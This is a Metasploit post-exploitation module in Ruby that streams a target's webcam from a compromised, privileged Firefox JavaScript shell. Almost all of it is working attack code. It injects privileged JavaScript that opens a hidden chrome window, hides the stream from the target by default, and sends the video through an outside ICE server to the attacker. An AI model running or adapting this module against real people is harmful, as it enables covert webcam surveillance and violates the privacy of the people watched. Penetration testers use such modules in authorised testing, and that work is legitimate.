1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'json'
7

8
class MetasploitModule < Msf::Post
9
  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
10
  include Msf::Post::WebRTC
11

12
  def initialize(info = {})
13
    super(
14
      update_info(
15
        info,
16
        'Name' => 'Firefox Webcam Chat on Privileged JavaScript Shell',
17
        'Description' => %q{
18
          This module allows streaming a webcam from a privileged Firefox JavaScript shell.
19
        },
20
        'License' => MSF_LICENSE,
21
        'Author' => [ 'joev' ],
22
        'References' => [
23
          [ 'URL', 'http://www.rapid7.com/db/modules/exploit/firefox/local/exec_shellcode' ]
24
        ],
25
        'DisclosureDate' => '2014-05-13',
26
        'Notes' => {
27
          'Stability' => [CRASH_SAFE],
28
          'SideEffects' => [SCREEN_EFFECTS],
29
          'Reliability' => []
30
        }
31
      )
32
    )
33

34
    register_options([
35
      OptBool.new('CLOSE', [false, 'Forcibly close previous chat session', false]),
36
      OptBool.new('VISIBLE', [false, 'Show a window containing the chat to the target', false]),
37
      OptInt.new('TIMEOUT', [false, 'End the chat session after this many seconds', -1]),
38
      OptString.new('ICESERVER', [true, 'The ICE server that sets up the P2P connection', 'wsnodejs.jit.su:80'])
39
    ])
40
  end
41

42
  def run
43
    unless os_check
44
      print_error 'Windows versions of Firefox are not supported at this time [RM #8810].'
45
      return
46
    end
47

48
    server = datastore['ICESERVER']
49
    offerer_id = Rex::Text.rand_text_alphanumeric(10)
50
    channel = Rex::Text.rand_text_alphanumeric(20)
51

52
    result = js_exec(js_payload(server, offerer_id, channel))
53

54
    if datastore['CLOSE']
55
      print_status 'Stream closed.'
56
    elsif result.present?
57
      print_status result
58
      connect_video_chat(server, channel, offerer_id)
59
    else
60
      print_warning 'No response received'
61
    end
62
  end
63

64
  def os_check
65
    user_agent = js_exec(%|
66
      return Components.classes["@mozilla.org/network/protocol;1?name=http"]
67
        .getService(Components.interfaces.nsIHttpProtocolHandler).userAgent;
68
    |)
69
    user_agent !~ /windows/i
70
  end
71

72
  def js_payload(server, offerer_id, channel)
73
    interface = load_interface('offerer.html')
74
    api = load_api_code
75

76
    interface.gsub!(/=SERVER=/, server)
77
    interface.gsub!(/=CHANNEL=/, channel)
78
    interface.gsub!(/=OFFERERID=/, offerer_id)
79

80
    if datastore['TIMEOUT'] > 0
81
      api << "; setTimeout(function(){window.location='about:blank'}, #{datastore['TIMEOUT'] * 1000}); "
82
    end
83

84
    url = if datastore['CLOSE']
85
            '"about:blank"'
86
          else
87
            '"data:text/html;base64,"+html'
88
          end
89

90
    name = if datastore['VISIBLE']
91
             Rex::Text.rand_text_alphanumeric(10)
92
           else
93
             '_self'
94
           end
95

96
    %|
97
      (function(send){
98
        try {
99

100
          var AppShellService = Components
101
             .classes["@mozilla.org/appshell/appShellService;1"]
102
             .getService(Components.interfaces.nsIAppShellService);
103

104
          var html = "#{Rex::Text.encode_base64(interface)}";
105
          var url = #{url};
106
          AppShellService.hiddenDOMWindow.openDialog(url, '#{name}', 'chrome=1,width=1100,height=600');
107
          send("Streaming webcam...");
108

109
        } catch (e) {
110
          send(e);
111
        }
112
      })(this.send);
113
    |
114
  end
115
end
116

117